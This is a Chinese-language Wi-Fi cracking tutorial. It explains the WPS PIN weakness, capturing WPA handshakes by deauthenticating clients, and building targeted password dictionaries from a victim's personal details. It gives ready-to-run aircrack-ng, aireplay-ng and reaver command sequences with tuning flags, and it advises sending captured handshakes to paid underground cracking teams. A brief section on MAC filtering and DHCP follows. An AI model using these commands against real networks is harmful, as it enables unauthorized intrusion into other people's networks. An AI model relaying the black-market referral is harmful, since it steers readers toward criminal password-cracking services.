WIFI滲透從入門到精通

0×00 前言

---

寫這篇文章的初衷也是因為狗哥的一篇文章 看到狗哥的這篇文章不禁感觸.不過我還是想說一句不一定免費的wifi才有風險哦~~.

0×01 讓小綿羊知道自己是怎麼被黑的.

---

路由器wps功能漏洞

路由器使用者往往會因為步驟太過麻煩，以致乾脆不做任何加密安全設定，因而引發許多安全上的問題。WPS用於簡化Wi-Fi無線的安全設定和網路管理。它支援兩種模式：個人識別碼(PIN)模式和按鈕(PBC)模式。路由器在出產時預設都開啟了wps但這真的安全麼！在2011年12月28日，一名名叫Stefan Viehbock的安全專家宣佈，自己發現了無線路由器中的WPS（Wi-Fi Protected Setup）漏洞，利用這個漏洞可以輕易地在幾小時內破解WPS使用的PIN碼以連上無線路由器的Wifi網路。

個人識別碼(PIN)

有人可能會問了什麼是pin碼？WPS技術會隨機產生一個八位數字的字串作為個人識別號碼（PIN）也就是你路由底部除了後臺地址賬號密碼之後的一組八位數的數字，透過它可以快速登入而不需要輸入路由器名稱和密碼等。

Pin碼會分成前半四碼和後半四碼。前四碼如果錯誤的話，那路由器就會直接送出錯誤訊息，而不會繼續看後四碼，意味著試到正確的前四碼，最多隻需要試 10000 組號碼。一旦沒有錯誤訊息，就表示前四碼是正確的，而我們便可以開始嘗試後四碼。 後四碼比前四碼還要簡單，因為八碼中的最後一碼是檢查碼，由前面七個數字產生，因此實際上要試的只有三個數字，共一千個組合。這使得原本最高應該可達一千萬組的密碼組合（七位數+檢查碼），瞬間縮減到僅剩 11,000 組，大幅降低破解所需的時間.

根據路由MAC地址算出預設pin碼

另外有種更快破解wifi的方法就是根據路由MAC地址（MAC是路由器的實體地址，是唯一的識別標誌）算出預設出產時的pin碼例如以下軟體 還可以透過別人共享的找到pin碼！http://mac-pin.456vv.net/

抓取握手包破解

提前條件是有客戶端連線wifi.另外作者是不會講破解wep的.使用的小夥伴好自為之. 就簡單介紹下原理吧 一個TCP包走進一家酒吧，對服務員說：“給我來瓶啤酒”。服務員說：“你要來瓶啤酒？”。TCP包說：“是的，來瓶啤酒”服務員說:“好的”

1、當一個無線客戶端與一個無線AP連線時，先發出連線認證請求（握手申請：你好！）

2、無線AP收到請求以後，將一段隨機資訊傳送給無線客戶端（你是？）

3、無線客戶端將接收到的這段隨機資訊進行加密之後再傳送給無線AP （這是我的名片）

4、無線AP檢查加密的結果是否正確，如果正確則同意連線 （哦～ 原來是自己人呀！）

通常我們說的抓“握手包”，是指在無線AP與它的一個合法客戶端在進行認證時，捕獲“資訊原文”和加密後的“密文”。 利用Deauth驗證攻擊。也就是說強制讓合法無線客戶端與AP被斷開，當它被從WLAN 中斷開後，這個無線客戶端會自動嘗試重新連線到AP上，在這個重新連線過程中，資料包通訊就產生了，然後利用airodump捕獲一個無線路由器與無線客戶端四次握手的過程，生成一個包含四次握手的cap包。然後再利用字典進行暴力破解.

另外也提下關於這行的黑色產業.當我們抓到帶資料的握手包時.這時候黑色產業往往會幫我們很大的忙.GPU速度也是我們普通裝置跑密碼的速度上百倍.所以我是不建議自己跑密碼的！吧包發給那些團隊,跑的出密碼才收10-30rmb不等的費用(根據需要跑的密碼定價分普通包還有金剛包，普通包的字典只使用十個G的字典.金剛包會使用五十G以上的字典收費也會偏貴些)不過也有一些團隊會收取電費(既跑不跑的出密碼都會收取一定的費用)...另外這樣的裝置非常耗電不是一般人的消耗的起的哦.一般閒置的時候會利用這樣的機器挖礦

分散式破解

《駭客追緝令》片中的主人公都是有使用到分散式破解的.拿電影中的米特尼克來說吧.劇情中他拿到下村勉的加密後的密文,一般電腦來說要跑出密碼需要幾十年至幾百年的時間才有機會跑出密碼.此時的米特尼克利用了偽裝.欺騙了某大學保安.偷偷的潛入進去使用大學中的超級電腦,只使用了幾個小時就能到了想要的結果！《血色星期一》中的主角三浦春馬使用了傀儡網路(肉雞)使他在半個小時拿到了密碼.(兩部電影因為太久沒看了可能有些地方說錯了見諒。)於2009年9月26日晚ZerOne無線安全團隊與AnyWlan無線門戶成功完成國內首次分散式破解專案. http://www.freebuf.com/tools/38668.html 工具附上.另外想說是分散式破解只是思路。不是破解方案。破不出來也沒有關係。

Wifi萬能鑰匙 or wifi分享

其實我是十分不願意提到這款流氓軟體的.但這也是大部分網友主要的破解wifi的途徑.為什麼我不願意提這款軟體.又必須提到呢.答:這款最流氓的功能也就是這款軟體最核心的功能.就是整合了全國各地的wifi賬號密碼.這必定包括一些惡意分享和一些無意分享出來的使用這款軟體開始的時候有兩個選項一.自動分享熱點.二.分享前提示我.預設是選擇一的.有些心急破解wifi的小夥伴可能看到沒看就直接點選了下一步.將自己本機儲存的wifi賬號無意間公之於眾.醬紫即使wifi密碼強度在強也會因為豬一樣的隊友.團滅.這樣誤操作的例子真的很多.不得不提到的就是這款軟體強大的整合了全國各地的wifi賬號密碼.當你使用這款軟體的時候可以很方便的根據附近的ssid.mac地址在萬能鑰匙的資料庫中找到正確的密碼.這方便了使用者也方便了不懷好意的童鞋~~ 小米科技也試著模仿盛大的萬能鑰匙.可最終還是死在了搖籃裡。 13年9月5日晚間訊息，小米科技今日年度釋出會上釋出的MIUI新功能——Wifi密碼自助分享引發爭議，眾多網友指責小米此行為將導致Wifi嚴重安全隱患，有咖啡店主甚至指責小米此行為如同偷竊。從2013-8-2開始到釋出會截止前，一個月就分享了32萬個公共Wi-Fi密碼，[email protected]偉 也對這個新功能十分憤怒，他表示：“我們只剩下兩個選擇：1、拒絕向使用小米手機的朋友提供家裡/公司的wifi密碼。2、使用小米手機的朋友離開之後馬上更改家裡\公司的wifi密碼。”另外為什麼萬能鑰匙沒有遭到封殺我也不得而知了.但我想勸大家一句.逼不得已千萬不要依靠萬能鑰匙.

弱密碼

WPA-PSK的密碼空間用浩瀚來形容一點不為過,所以直接進行字典攻擊是傻子的行為.但是作為一個密碼對字典攻擊來說有強密碼和弱密碼的區別.強密碼就是破解希望極其渺茫的密碼.弱密碼是很有希望破解的密碼當然強弱也是個相對概念,他也是依賴於加安全制的.銀行的密碼一般都為6 位.像這樣密碼空間如此小的密碼.普通情況下都為弱密碼.但是銀行的ATM 一天只讓你試三次.三次密碼不對鎖卡.有這樣的機制6 位的就不再是弱密碼了.由弱密碼組成的字典叫弱密碼字典. http://www.freebuf.com/articles/web/42120.html 這篇文章講的更為詳細.

有一定聯絡性規律性密碼

例子：有人曾破如此一個WPA-PSK 密碼IX1V7051242.如果你不瞭解這個密碼的背景你肯能會覺得很神奇，這麼強的密碼也能破。這樣的密碼是在西班牙的tele2 這樣的AP 上有，而且這樣AP_ESSID 裡都有tele2 欄位。這樣的密碼後面的8 位是相同的有真正的密碼只有四位。四位密碼其密碼空間很小很容易被字典攻擊出來。這個也是AP的預設密碼。所以這個密碼被破解是因為AP本身產生的隨機密碼就是個弱密碼。是AP的廠家自己降低了安全性的做法。例如有一些餐廳.酒店.事業單位.等等.SSID總會改成名字的拼音.密碼當然是跟ssid相關的.最常見的就是這個單位的電話號碼！

社會工程學

有目的性的社工師多多少少都掌握著WIFI使用者的個人資訊~.不然怎麼會叫做有目的的社工師呢.哈哈~~

例一個目標說吧了.會將跟目標有關係的人生日組合.姓名縮寫(即開頭字母).姓名拼音.手機號碼.一般目標的戀愛物件.暗戀物件.重要的人.不排除基友~.成功率最高.還有目標的.姓名.生日.手機號碼.郵箱號碼.網名(即ID.這招對黑闊很管用）.習慣用的字元,當然還有常用的密碼!!!.還有一些特殊號碼.特殊日子(結婚紀念日.開始戀愛)等等資料生成一個字典.】

舉一個例子一位在安全圈混的一位小黑闊.具有很高的安全意識,知道AP要使用一個很強大的密碼比如hack!@#1024.但他這個人比較懶到那都使用著這個密碼.然後這位黑闊在某個論壇某個網站註冊了賬號習慣性的輸入了引以為傲的強密碼.然後這些網站被黑(拖庫)社工師根據密碼生成了一個字典（根據洩露出來密碼進行組合）然後就不用我多說了.這樣的例子不少！《劍魚行動》中那個駭客是如何在一分鐘進入國家安全資訊網的啊。就是網路上工作著為他收集密碼的程式。而他就是透過這樣的字典迅速破解的。而這樣的字典真正的駭客也是不願意釋出出來的。

0×02 例項

---

抓取握手包破解.

網路卡的選擇也十分重要.一般使用筆記本內建網路卡破解的話一定要看一下網路卡型號kali有沒有驅動.我用的是8187卡,kali自帶驅動我就不說了。 本次的例項是根據抓握手包破解進行的

Airmon-ng start wlan0

意思是啟動網路卡的監聽模式.敲完這條命令後裝置名 wlan=mon0 一般命令後都是要跟上裝置名

Airodump-ng mon0 

在抓包前肯定是要先選擇目標.這條命令的意思是探測無線網路.選好目標,首選是客戶端連線多的.複製好BSSID即MAC地址.記住通道（CH）

Airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w mobi mon0

-C引數是選擇目標通道.如果該通道就目標一個AP使用的話不用加上--bssid,這個引數是為了跟精準的鎖定目標~~ -w 是儲存握手包的名字.獲取後會在當前目錄生成一個mobi-01.cap的握手包。這時就不用關閉這條shell而是另外開啟一個shell

Aireplay-ng -0 10 -a (AP的mac) -c (客戶端的mac) 

-0引數是發起deauth攻擊.10 是次數可以調節

-a 即第一條shell中BSSID.下面的AP路由器MAC地址

-c 即STATION下客戶機的MAC地址(這條為可選項)

Aircrack-ng -w /pentest/passwords/sxsx.lst mobi-01.cap

-w 選擇字典 mobi-01.cap 即抓到的握手包

Ps：我是不建議自己跑密碼的.我直接掛載u盤吧握手包copy到u盤裡在.透過QQ方式吧包發給跑包團隊. 然後是吧正確密碼新增到了我的字典裡。才會出現上圖（既成功破解後的圖）！ 另外是密碼使用有一定聯絡性規律性密碼

破解方案二:利用路由器wps功能漏洞

Airodump-ng mon0 檢視附近無線情況。在MB這行帶點的“.”表示能跑出pin碼。使用wash -i mon0 -C可檢視是否開啟了wps功能

Reaver -i mon0 -b xx:xx:xx:xx -vv

reaver命令引數

-i 監聽後介面名稱

-b 目標mac地址

-a 自動檢測目標AP最佳配置

-S 使用最小的DH key（可以提高PJ速度）

-vv 顯示更多的非嚴重警告

-d 即delay每窮舉一次的閒置時間 預設為1秒

-t 即timeout每次窮舉等待反饋的最長時間

-c 指定頻道可以方便找到訊號，如-c1 指定1頻道，大家檢視自己的目標頻道做相應修改 （非TP-LINK路由推薦–d9 –t9 引數防止路由僵死

示例：

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv

應因狀況調整引數（-c後面都已目標頻道為1作為例子） 目標訊號非常好:

reaver -i mon0 -b MAC -a -S -vv -d0 -c 1

目標訊號普通:

reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1

目標訊號一般:

reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

0×03 防禦只是一個步驟.安全是一個系統.

---

看我任何突MAC封鎖！

客戶機的截圖模擬主人使用MAC過濾功能！.

在路由器上使用mac過濾.駭客就一點辦法的沒有了麼？.no！

由於路由器只接受白名單的資料包.所以kali無法從dns伺服器獲取到域名IP

偽裝MAC地址上網由於有兩個無線客戶端.所有的資料包都會傳送至兩個客戶端.難免會出現資料包丟失的！

關閉dhcp真的有用麼?

首先我先模擬WIFI的管理員.吧DHCP關了.並且設定了一個只有自己知道的閘道器IP.

可以清楚的看到.kali並不在管理員使用的網段內.但在OSI二層環境中.kali抓取了路由器與客戶端的ARP報文.